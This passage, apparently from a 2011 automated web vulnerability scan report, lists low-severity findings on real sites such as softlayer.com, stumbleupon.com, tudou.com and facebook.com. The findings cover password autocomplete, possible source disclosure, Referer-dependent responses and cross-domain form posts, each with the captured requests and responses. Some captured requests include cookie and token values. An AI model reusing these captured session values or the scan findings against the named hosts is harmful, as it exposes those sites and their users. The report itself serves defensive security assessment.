Path:   /about/feedback

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /about/feedback HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:18 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:18 GMT
Connection: close
Content-Type: text/html
Content-Length: 21557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.18. http://www.softlayer.com/cloudlayer/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /cloudlayer/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /cloudlayer/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 23260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.19. http://www.softlayer.com/dedicated/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /dedicated/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /dedicated/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:23 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:23 GMT
Connection: close
Content-Type: text/html
Content-Length: 104124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.20. http://www.softlayer.com/index.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /index.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /index.html HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:22 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:22 GMT
Connection: close
Content-Type: text/html
Content-Length: 29867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.21. http://www.softlayer.com/legal/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /legal/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /legal/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:20 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:20 GMT
Connection: close
Content-Type: text/html
Content-Length: 21961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.22. http://www.softlayer.com/partners/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /partners/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /partners/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:27 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:27 GMT
Connection: close
Content-Type: text/html
Content-Length: 40276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="ht
...[SNIP]...
<div style="margin: 10px 5px 0 0;">
<form method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">

<div class="portal">
...[SNIP]...
</label>
<input type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.23. http://www.softlayer.com/press

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /press

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /press HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:28 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 76287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.24. http://www.softlayer.com/resources/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /resources/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /resources/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:22 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:22 GMT
Connection: close
Content-Type: text/html
Content-Length: 23896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.25. http://www.softlayer.com/resources/mobile-apps/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /resources/mobile-apps/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /resources/mobile-apps/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:21 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:21 GMT
Connection: close
Content-Type: text/html
Content-Length: 24909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.26. http://www.softlayer.com/sitemap/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /sitemap/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /sitemap/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:29 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 27263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.27. http://www.softlayer.com/solutions/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /solutions/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /solutions/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:26 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:26 GMT
Connection: close
Content-Type: text/html
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.28. http://www.softlayer.com/specials/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /specials/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /specials/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:29 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:29 GMT
Connection: close
Content-Type: text/html
Content-Length: 20444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.29. http://www.softlayer.com/virtualization/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /virtualization/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /virtualization/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 22859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<div
style="margin: 10px 5px 0 0;"><form
method="post" action="https://manage.softlayer.com/index/index" id="loginform" name="loginform">
<div
class="portal">
...[SNIP]...
</label> <input
type="password" id="pwd" name="pwd" size="12" tabindex="2" class="input" />
</div>
...[SNIP]...

8.30. http://www.stumbleupon.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 10210
Date: Wed, 06 Jul 2011 11:21:19 GMT
Age: 0
Via: 1.1 varnish
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
</a>
               <form action="/login.php" name="formLogin" method="post" id="formLogin">                    
                   <ul>
...[SNIP]...
</label>
                           <input class="text" type="password" id="passwordHeader" name="password" maxlength="16" />
                           <input class="text hidden" type="text" value="Password" tabindex="0" name="dummyPassword" id="switch" />
...[SNIP]...

8.31. http://www.stumbleupon.com/login.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /login.php HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 9553
Date: Wed, 06 Jul 2011 11:21:20 GMT
Age: 0
Via: 1.1 varnish
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
</h1>
                               <form method="post" name="formLogin" action="http://www.stumbleupon.com/login.php" id="loginForm">
                   <fieldset class=" labelLeft">
...[SNIP]...
<div class="iefix">
                               <input class="text" type="password" name="password" value="" maxlength="16" id="password" />
                               <a href="http://www.stumbleupon.com/reset_password/">
...[SNIP]...

9. Source code disclosure

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.tudou.com
Path:   /v/

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /v/ HTTP/1.1
Host: www.tudou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: tws0.3
Date: Wed, 06 Jul 2011 14:04:04 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tudou=07290da15c4a46bcc3b820765334a527; path=/; domain=.tudou.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13738

357c
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh-CN" dir="ltr">
<head>
   <meta http-equ
...[SNIP]...
<a class="inner" href="<%=link%>" title="<%=title%>" target="new">
...[SNIP]...
<img class="pack_clipImg" alt="....: <%=title%>" src="<%=pic%>" width="120" height="90"/>
...[SNIP]...
<a href="<%=link%>" title="<%=title%>" target="new"><%=title%></a>
...[SNIP]...
<li>......<%=pubDate%></li>',
                               '<li>......<%=time%></li>',
                               '<li>......<%=playnum%></li>
...[SNIP]...
<a target="_blank" href="<%=userlink%>"><%=ownerName%></a>
...[SNIP]...

10. Referer-dependent response

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kind of user-supplied data.

Request 1

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ca49352c%26origin%3Dhttp%253A%252F%252Fsocial.zune.net%252Ff23b1025f4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fsocial.zune.net%2FMOVIES%2F0%2F34FA18EC-ECDA-4609-BE85-CE80D58C3842%3Ftarget%3Dweb%26culture%3Den-US&layout=button_count&locale=en_US&node_type=link&ref=movie&sdk=joey&show_faces=false&width=100 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://social.zune.net/MOVIES/0/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.246.30
X-Cnection: close
Date: Wed, 06 Jul 2011 11:20:28 GMT
Content-Length: 5867

<!doctype html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8"><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" h
...[SNIP]...
<div id="connect_widget_4e1444fbf42227f46617671" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">2</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">1</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"acc4a56a",fb_dtsg:"AQDAKBut",no_cookies:1,lhsh:"KAQAICqkb"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"http:\/\/static.ak.fbcdn.net\/connect\/xd_proxy.php?version=3#cb=f3ca49352c&origin=http\u00253A\u00252F\u00252Fsocial.zune.net\u00252Ff23b1025f4&relation=parent.parent&transport=postmessage","nodeType":"page","externalURL":"http:\/\/social.zune.net\/MOVIES\/0\/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web&culture=en-US","pageId":null,"widgetID":"connect_widg
...[SNIP]...

Request 2

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3ca49352c%26origin%3Dhttp%253A%252F%252Fsocial.zune.net%252Ff23b1025f4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fsocial.zune.net%2FMOVIES%2F0%2F34FA18EC-ECDA-4609-BE85-CE80D58C3842%3Ftarget%3Dweb%26culture%3Den-US&layout=button_count&locale=en_US&node_type=link&ref=movie&sdk=joey&show_faces=false&width=100 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=83J6J

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.243.40
X-Cnection: close
Date: Wed, 06 Jul 2011 11:20:42 GMT
Content-Length: 5785

<!doctype html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8"><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" h
...[SNIP]...
<div id="connect_widget_4e14450ab53125f35559986" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">2</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">1</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"9a5258ef",fb_dtsg:"AQDAKBut",no_cookies:1,lhsh:"oAQD_lCNq"};
</script>
<script>



onloadRegister(function (){Bootloader.done([])});
onloadRegister(function (){(function() { new ExternalPageLikeWidget({"viewer":0,"channelURL":"http:\/\/static.ak.fbcdn.net\/connect\/xd_proxy.php?version=3#cb=f3ca49352c&origin=http\u00253A\u00252F\u00252Fsocial.zune.net\u00252Ff23b1025f4&relation=parent.parent&transport=postmessage","nodeType":"page","externalURL":"http:\/\/social.zune.net\/MOVIES\/0\/34FA18EC-ECDA-4609-BE85-CE80D58C3842?target=web&culture=en-US","pageId":null,"widgetID":"connect_widg
...[SNIP]...

11. Cross-domain POST
There are 2 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


11.1. https://www.drtserver.com/microsoft/1/login.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.drtserver.com
Path:   /microsoft/1/login.html

Issue detail

The page contains a form which POSTs data to the domain www.microsoftaffiliates.com. The form contains the following fields:

Request

GET /microsoft/1/login.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.drtserver.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Thu, 07 Jul 2011 13:27:09 GMT
Server: Apache/2.2.16 (Unix)
Location: https://www.microsoftaffiliates.com/index.html?content=Microsoft
X-Server-Name: www@dc1dtweb59
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 17547

<html>
<script language="JavaScript">
<!--
function medopen() {
   coolopenWindow=window.open("/flash/mediakit.html","medopen","scrollbars=0,menubar=0,statusbar=0,toolbar=0,height=560,width=362,out
...[SNIP]...
<td class="login">
   
<form method="POST" action="https://www.microsoftaffiliates.com/" style="margin:0; padding:0 0 0 40px;">

